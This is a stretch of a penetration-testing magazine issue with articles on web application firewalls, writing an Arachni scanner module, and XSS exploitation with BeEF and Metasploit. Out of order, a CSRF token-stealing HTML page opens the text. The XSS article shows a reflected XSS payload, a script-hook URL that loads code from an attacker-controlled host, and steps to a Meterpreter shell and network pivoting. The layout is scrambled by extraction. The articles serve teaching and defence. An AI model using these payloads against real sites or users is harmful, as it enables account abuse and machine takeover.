www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery) etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
    <title>BAD.COM</title>
    <script>
    function submitForm() {
        var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
        var myForm = document.myForm;
        myForm.token.value = token;
        myForm.submit();
    }
    </script>
</head>
<body onLoad="submitForm()">
    <div style="display:none">
        <iframe src="http://good.com/index.php"></iframe>
        <form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
            <input type="text" name="message" value="I like www.bad.com" />
            <input type="hidden" name="token" value="" />
            <input type="submit" value="Post">
        </form>
    </div>
</body>
</html>
WEB APPLICATION CHECKING
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide. They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of ever more powerful applications that provide the internet user with the required functions as quickly and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having sufficiently checked the security status of the web applications.

Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous if they have not been subjected to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much they knew.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and from there to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. With it, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that rely on nothing more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
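The session fixation point can be illustrated with a small sketch (Python, with an in-memory session store; all names are hypothetical and not from the article): re-issuing the session ID at login invalidates any ID an attacker may have planted or observed beforehand.

```python
import secrets

sessions = {}  # session_id -> data; stand-in for a server-side session store

def create_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"authenticated": False}
    return sid

def login(sid, user):
    # The critical step: drop the pre-login ID and issue a fresh one,
    # so a fixated (attacker-chosen or attacker-known) ID becomes useless.
    data = sessions.pop(sid)
    data.update(authenticated=True, user=user)
    new_sid = secrets.token_hex(16)
    sessions[new_sid] = data
    return new_sid

pre_login = create_session()        # the ID an attacker might know
post_login = login(pre_login, "alice")
print(pre_login in sessions)        # False: the old ID no longer works
```

An application whose login step keeps the pre-login ID would skip the pop-and-reissue, which is exactly the weakness described above.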
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether correcting them makes business sense. It should not be forgotten that other systems are put at risk by an unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by then, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably reduces the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application itself; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis, as this would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all conceivable threats. In this context too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range.
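The parameter rules just described (number of parameters, maximum length, permitted characters) can be sketched as a toy validator; the rule format below is invented for illustration and does not correspond to any vendor's actual WAF configuration:

```python
import re

# Hypothetical per-form rules: the expected parameters and their limits.
RULES = {
    "message": {"max_len": 256, "pattern": re.compile(r"^[\w\s.,!?-]*$")},
    "token":   {"max_len": 32,  "pattern": re.compile(r"^[0-9a-f]*$")},
}

def request_allowed(params):
    # Block requests carrying parameters that were never defined
    # (the "three or more parameters" case from the text).
    if set(params) - set(RULES):
        return False
    # Check length and character set of each submitted parameter.
    for name, value in params.items():
        rule = RULES[name]
        if len(value) > rule["max_len"] or not rule["pattern"].match(value):
            return False
    return True

print(request_allowed({"message": "hello", "token": "ab12"}))          # True
print(request_allowed({"message": "hi", "token": "ab12", "x": "y"}))   # False: extra parameter
```

A real WAF would of course apply such rules per URL and form, but the principle of rejecting anything outside the declared parameter profile is the same.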
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; whitelist-only approaches quickly become outdated because of the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
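A rough sketch of that combined approach (a learned whitelist consulted first for high-value pages, with blacklist signatures as the fallback elsewhere); the URLs and patterns are made up for illustration:

```python
import re

# Learned whitelist: URL -> set of acceptable parameter names
whitelist = {"/order": {"item", "qty"}}

# Negative-security fallback: a few classic attack signatures
blacklist = [re.compile(p, re.I) for p in (r"<script", r"union\s+select", r"\.\./")]

def allowed(url, params):
    if url in whitelist:
        # High-value sub-section: only the learned parameters pass.
        return set(params) <= whitelist[url]
    # Everything else: block only values matching known-bad patterns.
    return not any(pat.search(v) for v in params.values() for pat in blacklist)

print(allowed("/order", {"item": "42", "qty": "1"}))            # True
print(allowed("/order", {"item": "42", "evil": "x"}))           # False
print(allowed("/search", {"q": "1 UNION SELECT password"}))     # False
```

The sketch shows why the combination is attractive: the whitelist needs re-learning only for the few pages it covers, while the blacklist catches the common attack patterns everywhere else.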
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even after the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute
  and modify this program under the term of the
  GPL v2.0 License (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )
        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }
        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information is available.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module

Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, the module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.

If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.

Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.

Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans) as well as create a report entry for it.

Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, are now part of the experimental Arachni code base.
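Stripped of the Arachni API, the core logic of the module can be sketched standalone. This is a hedged illustration, not Arachni code: the helper name candidate_urls is ours, and the real module issues HTTP requests where this sketch only builds the candidate URLs.

```ruby
require 'set'

# Standalone sketch (not the Arachni API) of what the module does:
# filter the wordlist down to directory names, build candidate URLs
# for a page's path, and keep a Set of already-audited paths so the
# same path is never scanned twice.
def candidate_urls(page_path, wordlist, audited = Set.new)
  return [] if audited.include?(page_path)
  audited << page_path
  # entries containing a dot are treated as files, not directories
  dirs = wordlist.reject { |entry| entry.include?('.') }
  dirs.map { |dir| page_path + dir + '/' }
end

urls = candidate_urls('http://example.com/', ['admin', 'backup.tar', 'trunk'])
# => ["http://example.com/admin/", "http://example.com/trunk/"]
```

In the real module each resulting URL is passed to log_remote_directory_if_exists, which performs the request and reports hits.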
Conclusion

We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.

And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC

To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this.
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation
Figure 2: BeEF after configuration
Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1: The user enters a search term in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).

Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right hand side or the Zombie section on the left hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).

Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).

So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text input, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>

The screenshot clarifies the above steps (Figure 1).
BeEF – Hook the user's browser

Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.

I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3: Connection with the BeEF controller
Figure 4: What the attacker will see
Figure 5: What the victim will see
Figure 6: Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.

I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page

This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).

Detect all Plugins on the User's Browser

There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell

Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7: Detecting plugins on the user's browser
Figure 8: Starting Metasploit
Figure 9: The "jobs" command
Figure 10: Metasploit after clicking "Send Now"
Figure 11: Meterpreter window – screenshot 1
Figure 12: Meterpreter window – screenshot 2
Now first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).

Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).

If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).

Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self explanatory, so I won't say much (Figure 11-13).

The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.

Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation

To mitigate XSS, one must do the following:
Figure 13: Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output must be encoded before displaying it to the user. The OWASP XSS prevention cheat sheet is a good guide for the same.
• White list and black list filtering can also be used to completely disallow specific characters in user input fields.
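As a sketch of the output-encoding point: in Ruby, the standard library's CGI.escapeHTML neutralizes the payload used earlier in this article (PHP's htmlspecialchars plays the same role; the choice of Ruby here is ours, for illustration).

```ruby
require 'cgi'

# Encoding on output: the payload is rendered as inert text
# by the browser instead of being executed as script.
payload = "<script>alert(document.domain)</script>"
encoded = CGI.escapeHTML(payload)
# => "&lt;script&gt;alert(document.domain)&lt;/script&gt;"
```

Note that HTML-body encoding alone is not enough for attribute, URL or JavaScript contexts; the OWASP cheat sheet covers the per-context rules.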
Conclusion

In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So, while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings – http://resources.infosecinstitute.com/author/arvind AND http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
